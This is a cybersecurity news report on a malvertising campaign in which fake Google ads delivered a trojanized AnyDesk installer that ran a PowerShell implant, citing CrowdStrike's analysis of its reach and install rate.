On Wednesday, the cybersecurity researchers publicized the disruption of a clever malvertising campaign network that is currently targeting AnyDesk remote access. The malicious advertising network targets the remote access software for the devices (PC, mobile and laptops). It delivers a weaponized installer via the rogue Google ads that appeared in the search engine results pages (SERPs).
The malvertising campaign is believed to have commenced as early as the 21st of April, 2021. It involves a malicious file that poses as an executable setup for AnyDesk (AnyDeskSetup.exe). As this setup gets executed, it downloads a PowerShell implant to assemble and exfiltrate the system information.
“The script had some obfuscation and multiple functions that resembled an implant as well as a hardcoded domain (zoomstatistic[.]com) to ‘POST’ reconnaissance information such as user name, hostname, operating system, IP address and the current process name,” researchers from Crowdstrike said in an analysis.
As per the statistics of the remote access company’s website, the remote desktop access of AnyDesk has been constantly downloaded by more than a million dedicated users across the globe. However, the cybersecurity firm has not attributed the cyber activity to a particular threat actor or nexus. But, the company has suspected it to be a “widespread campaign affecting a wide range of customers”, depending on the large user base.
The PowerShell script might have all the properties of a typical backdoor. But, it is just the intrusion route that is a little different, pointing out that it is beyond a variety of data accumulating operations. The AnyDesk installer is distributed via the malevolent Google Ads (malvertising campaign) that the threat actor cleverly places. These manipulated ads are then served to the unsuspected individuals who use Google’s search engine to search for AnyDesk.
When these individuals click on the fraudulent ad results, the users are redirected to a social engineering page, which is a clone of the legit AnyDesk website. Additionally, it provides the individual with a direct link to the trojanized installer.
Crowdstrike has estimated that 40% of the clicks done on the malicious malvertising campaign had turned into installations that included follow-on-hands-on-keyboard activity.
“While it is unknown what percentage of Google searches for AnyDesk resulted in clicks on the ad, a 40% Trojan installation rate from an ad click shows that this is an extremely successful method of gaining remote access across a wide range of potential targets,” the researchers said.
The AnyDesk company has also stated that it had notified Google of its findings. This has taken immediate action to bring the advertisement in question.
“This malicious use of Google Ads is an effective and clever way to get mass deployment of shells, as it provides the threat actor with the ability to freely pick and choose their target(s) of interest,” the researchers concluded.
“Because of the nature of the Google advertising platform, it can provide a really good estimate of how many people will click on the ad. From that, the threat actor can adequately plan and budget based on this information. In addition to targeting tools like AnyDesk or other administrative tools, the threat actor can target privileged/administrative users in a unique way.”
Source: The Hacker News
Disclaimer: Read the complete disclaimer here.